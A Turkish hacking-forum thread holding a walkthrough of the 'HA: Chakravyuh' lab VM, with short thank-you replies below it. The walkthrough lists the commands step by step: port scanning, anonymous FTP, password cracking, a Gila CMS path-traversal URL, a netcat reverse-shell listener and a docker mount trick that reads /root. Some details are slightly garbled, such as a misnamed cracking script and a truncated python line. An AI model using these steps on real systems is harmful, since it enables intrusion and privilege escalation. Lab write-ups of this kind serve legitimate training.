THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

HA: Chakravyuh Zafiyetli Makine Çözümü // Xowly

Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
12
2947
09-11-2019 10:54
#1
HA: Chakravyuh

Merhabalar değerli Türk Hack Team ailesi, bu konumda sizlere "HA: Chakravyuh Zafiyetli Makine Çözümünü" göstereceğim. Zafiyetli Makine Çözümünü yaptığım kaynağa ulaşmak için tıklayın; Tıklayın.

HA: Chakravyuh



İsim: HA: Chakravyuh

Çıkış Tarihi: 30 Ekim 2019

Yapım: Hacking Articles

Dosya Boyutu: 1.1-Gb

Zorluk: Orta Düzey

Açıklama: "Root Erişimini Almak"

Hedef: final.txt

Seri: HA



Her şeyden önce hedefimizi belirlemeye çalışıyoruz ve gerekli İP ve Mac Adreslerini belirliyoruz. netdiscover


Hedef makinemiz içerisinde bulunan servis ve sağlayıcılar için bilgi toplamak amacıyla bağlantı noktalarını tarıyoruz. Tüm bağlantı noktalarını taradığımızda, hedef Makinede SSH hizmeti (22), HTTP servisi (80), FTP servisi (65530) bulunduğunu görüyoruz.

Kod:
 nmap -p- -A 192.168.1.105





Ardından tarayıcımıza 192.168.105 yazarak anasayfamıza gidiyoruz.




Daha sonra dikkatimizi 65530 limanına yönlendirilen hizmete yönlendirdik. FTP hizmetine girdikten sonra pub adında bir belge bulmaya çalışıyoruz. İçinde arjun adlı bir sıkıştırılmış"7z dosyası" var. Daha sonrasında get komutu yardımıyla indirmemizi yapıyoruz.

Kod:
 ftp 192.168.1.105 65530


Kod:
 Anonymous


Kod:
 ls


Kod:
 get arjun.7z


Kod:
 bye





Daha sonrasında indirmemiz tamamlandığında dosyayı "Archive Manager" ile açmayı deniyoruz. Ardından karşımıza gelen ekranda bize bir şifre soruyor. Bu şifreyi çeşitli yollarla bulmayı deniyoruz.

Daha sonrasında "John The Ripper" aracını kullanmaktan başka çaremiz kalmıyor. Ardından şifrenin "xyz2john" olduğunu öğreniyoruz. Ardından bunu google kullanarak aratıyoruz. Ardından karşımıza "7z2john" çıkıyor.

Kod:
 python 7z2ctf.py arjun.7z > hash


Kod:
 john --wordlist=/usr/share/wordlists/rockyou.txt hash


Kod:
 john hash --show


Kod:
arjun.7z:family






Sıkıştırılmış dosyayı, içinde gizli bir metin dosyası bulmak için açtık. Secret.txt açıldığında içinde kodlanmış bir metin bulunuyor. İlk bakışta, Base64 kodlu metin gibi görünüyordu.

Kod:
 Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=




Echo ve base64 komutunu kullanarak secret.txt dosyasındaki metnin kodunu çözmeyi başardık.

Kod:
 echo "Z2lsYTphZG1pbkBnbWFpbC5jb206cHJpbmNlc2E=" | base64 -d


Kod:
 gila:[email protected]:princesa




Gila CMS'ye sahip olduğumuz ipucunu aldık. Ardından buraya erişim sağlamaya çalıştık. Sonucunda bir web sayfası önümüze geldi.

Kod:
 http://192.168.1.105/gila/




Ardından" /gila/admin " şeklinde girmeyi deniyoruz.

Kod:
 http://192.168.1.105/gila/admin




Kod:
princesa



Ardından admin paneline giriş yapmış bulunduk. Daha sonrasında exploit için bir yol aramaya başladık.





Ardından araştırmalarımız sonucunda bir şey bulamadık. Bundan dolayı searchsploit içerisinde keşif yapıyoruz.


Kod:
 searchsploit gila cms



Kod:
 Gila CMS < 1.11.1 - Local File Inclusio


Kod:
 searchsploit -m 47407


Kod:
 cat 47407.txt




Xampp Server üzerinde çalıştığını ve hedef makinemizin bir Linux makinesi olduğunu rahatça görebiliyoruz. Böylece, "/etc/passwd" da bulunan linki değiştirdik. Ayrıca, gilacms bölümünde hali hazırda bir web sayfası bulunuyor. /gila/ 'da gördük. Böylece biz de o kısmı değiştirdik.

Kod:
 http://192.168.1.105/gila/admin/fm/?f=src../../../../../../../../../etc/passwd






İndex.php dosyasına sahip olduğumuzu görüyoruz. Girdiğimiz yol gibiydi. Dosyayı açtık. Dizin sayfasının görüntülenmesi için PHP kodunu içeriyordu. PHP reverse shell kodumuzu pentestmonkey ile kullandık. IP Adresini Saldırgan Makinemizin IP adresi ile değiştirdik. Saldırgan makinemizde bir netcat dinlemesi başlattık. Gerekli değişiklikleri yaptıktan sonra değişiklikleri index.php içerisine kaydettik. Ardından dosyayı açtık




Dosyayı açtığımızda, PHP'nin reverse shell'i çalıştı ve shell'i hedef makineye aldık. Yanlış bir shell olduğundan uygun bir shell'e dönüştürmek için kullandık. Memnuniyeti gereğince kabuğu aldıktan sonra, hedef makinedeki kullanıcıları ve grupları görmek için id komutunu çalıştırdık.


Kod:
 
nc -lvp 1234


Kod:
 
python -c 'import


Kod:
 
id





Docker çalışırken, docker'da docker'daki tüm komutların sudo gerektirmesi ve docker'ın çalışması için root gerektirmesi sorunu olduğunu biliyoruz. Bundan dolayı aşağıdaki komutu çalıştırıyoruz.

Kod:
 docker run -v /root:/mnt -it alpine


Kod:
cd /mnt


Kod:
ls


Kod:
cat final.txt








Evet Türk Hack Team ailesi konum bu kadar. Bir sonraki konumda görüşmek üzere. Esenlikler



Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
09-11-2019 23:47
#2
Güncel +++
By Ghost - ait Kullanıcı Resmi (Avatar)
Yardımsever
Üyelik tarihi:
07/2013
Nereden:
C:\Linux
Yaş:
24
Mesajlar:
939
Konular:
144
Teşekkür (Etti):
400
Teşekkür (Aldı):
457
Ticaret:
(0) %
10-11-2019 01:24
#3
Elinize sağlık adım adım tertemiz bir anlatım yapmışsınız En kısa zamanda kurup denicem
---------------------
Öfkene hakim olamıyorsan;
Niye yaşıyorsun?

-->Muslims Freedom!!!<--
Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
10-11-2019 12:44
#4
Alıntı:
By Ghost´isimli üyeden Alıntı Mesajı göster
Elinize sağlık adım adım tertemiz bir anlatım yapmışsınız En kısa zamanda kurup denicem
Teşekkür ediyorum.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
10-11-2019 16:55
#5
Ellerine saglik junior
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
10-11-2019 20:50
#6
Alıntı:
"P4RS´isimli üyeden Alıntı Mesajı göster
Ellerine saglik junior
Teşekkürler kıdemli bey
z2salkovski - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
root$
Mesajlar:
240
Konular:
16
Teşekkür (Etti):
3
Teşekkür (Aldı):
37
Ticaret:
(0) %
10-11-2019 21:00
#7
Vay, şaşırdım. Emek var eline sağlık.
--------------------- Gül rengi fermente üzüm suyu, içilmez mi böyle günde?
637ad44b4e72e2b58fa8c5d0cac6701d
Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
10-11-2019 22:31
#8
Alıntı:
z2salkovski´isimli üyeden Alıntı Mesajı göster
Vay, şaşırdım. Emek var eline sağlık.
Teşekkür ederim
"PurpposoLes - ait Kullanıcı Resmi (Avatar)
Kıdemli Üye
Üyelik tarihi:
09/2016
Nereden:
/root/.purp/
Mesajlar:
3.467
Konular:
289
Teşekkür (Etti):
1116
Teşekkür (Aldı):
1438
Ticaret:
(0) %
10-11-2019 23:01
#9
Başarılı bir konu tebrik ederim.
---------------------
ι'м α вℓα¢к нαт

Telegram
andro26 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
04/2015
Nereden:
los encılıs
Mesajlar:
244
Konular:
11
Teşekkür (Etti):
35
Teşekkür (Aldı):
18
Ticaret:
(0) %
10-11-2019 23:49
#10
faydalı teşekkürler

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler